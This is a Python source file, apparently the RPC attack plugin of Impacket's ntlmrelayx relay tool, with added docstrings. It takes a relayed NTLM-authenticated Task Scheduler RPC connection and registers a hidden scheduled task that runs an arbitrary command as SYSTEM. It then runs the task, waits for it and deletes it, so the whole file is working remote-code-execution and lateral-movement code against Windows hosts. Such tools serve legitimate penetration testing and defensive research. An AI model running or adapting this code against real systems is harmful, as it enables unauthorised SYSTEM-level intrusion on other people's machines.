
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Authors:
#   Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
#   Based on @agsolino and @_dirkjan code
#

13 

14import time 

15import string 

16import random 

17 

18from impacket import LOG 

19from impacket.dcerpc.v5 import tsch 

20from impacket.dcerpc.v5.dtypes import NULL 

21from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

22 

# Name of the plugin class defined in this module (matches RPCAttack below);
# presumably read by the ntlmrelayx attack loader -- verify against the loader.
PROTOCOL_ATTACK_CLASS = "RPCAttack"

24 

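class TSCHRPCAttack:
    """Mixin that drives a relayed Task Scheduler (TSCH) RPC endpoint.

    The host class must provide ``self.dce`` (a bound DCE/RPC connection),
    ``self.config.command`` (the command line to execute) and
    ``self.stringbinding`` (used only for logging); see ``RPCAttack``.

    Defensive note: the register/run/delete sequence below is host-side
    Task Scheduler activity on the target and will typically be recorded by
    its scheduler and process-creation telemetry.
    """

    #: Seconds to sleep between SchRpcGetLastRunInfo polls.
    POLL_INTERVAL = 2

    def _xml_escape(self, data):
        """Return *data* with the five XML special characters escaped.

        The replacement is a single per-character pass, so an ``&`` produced
        by one substitution is never escaped a second time.  It is applied to
        the ``<Command>``/``<Arguments>`` text nodes of the task XML, whose
        content derives from the user-supplied command line.

        Args:
            data: text to escape (an empty string yields an empty string).

        Returns:
            the escaped text.
        """
        replace_table = {
            "&": "&amp;",
            '"': "&quot;",
            "'": "&apos;",
            ">": "&gt;",
            "<": "&lt;",
        }
        return ''.join(replace_table.get(c, c) for c in data)

    def _build_task_xml(self, cmd, args):
        """Return the task definition XML for executing *cmd* *args*.

        The definition carries a daily calendar trigger, runs as the
        S-1-5-18 principal at ``HighestAvailable`` run level, is marked
        hidden and has a three-day execution time limit.  Both *cmd* and
        *args* are XML-escaped before being substituted into the template.
        """
        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>%s</Command>
      <Arguments>%s</Arguments>
    </Exec>
  </Actions>
</Task>
        """ % (self._xml_escape(cmd), self._xml_escape(args))
        return xml

    def _wait_for_task(self, tmpName):
        """Poll SchRpcGetLastRunInfo until a last-run time is reported.

        The loop treats a zero ``wYear`` in ``pLastRuntime`` as "no run
        recorded yet" and sleeps ``POLL_INTERVAL`` seconds between polls.
        No upper bound is applied (same as the original behaviour); an
        exception or interrupt propagates to ``_run``, which still cleans up.
        """
        while True:
            LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
            resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
            if resp['pLastRuntime']['wYear'] != 0:
                return
            time.sleep(self.POLL_INTERVAL)

    def _run(self):
        """Register a throw-away task, run it, wait for it and delete it.

        Raises whatever the underlying ``tsch`` calls raise.  Once
        registration has succeeded the task exists on the target, so the
        delete call is issued from a ``finally`` block: the previous
        straight-line version skipped it whenever run or polling failed and
        left the hidden task registered.
        """
        tmpName = ''.join(random.choice(string.ascii_letters) for _ in range(8))

        cmd = "cmd.exe"
        args = "/C %s" % self.config.command

        LOG.info('Executing command %s in no output mode via %s', self.config.command, self.stringbinding)

        xml = self._build_task_xml(cmd, args)

        LOG.info('Creating task \\%s' % tmpName)
        tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)

        try:
            LOG.info('Running task \\%s' % tmpName)
            tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)
            self._wait_for_task(tmpName)
        finally:
            # Always attempt cleanup once the task exists, even if running or
            # polling it raised; a failure here chains onto the original error.
            LOG.info('Deleting task \\%s' % tmpName)
            tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
        LOG.info('Completed!')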

108 

109 

class RPCAttack(ProtocolAttack, TSCHRPCAttack):
    """ntlmrelayx attack plugin for a relayed RPC connection.

    Assumes the relayed endpoint is the Task Scheduler (TSCH) and delegates
    the work to ``TSCHRPCAttack._run`` when a command has been configured.
    """
    PLUGIN_NAMES = ["RPC"]

    def __init__(self, config, dce, username):
        ProtocolAttack.__init__(self, config, dce, username)
        # Keep the DCE/RPC binding and its transport's string binding for the
        # TSCH helper (RPC calls and log messages respectively).
        transport = dce.get_rpc_transport()
        self.dce = dce
        self.rpctransport = transport
        self.stringbinding = transport.get_stringbinding()

    def run(self):
        # Assume the endpoint is TSCH
        # TODO: support relaying RPC to different endpoints
        # TODO: support for providing a shell
        # TODO: support for getting an output
        if self.config.command is None:
            LOG.error("No command provided to attack")
            return
        TSCHRPCAttack._run(self)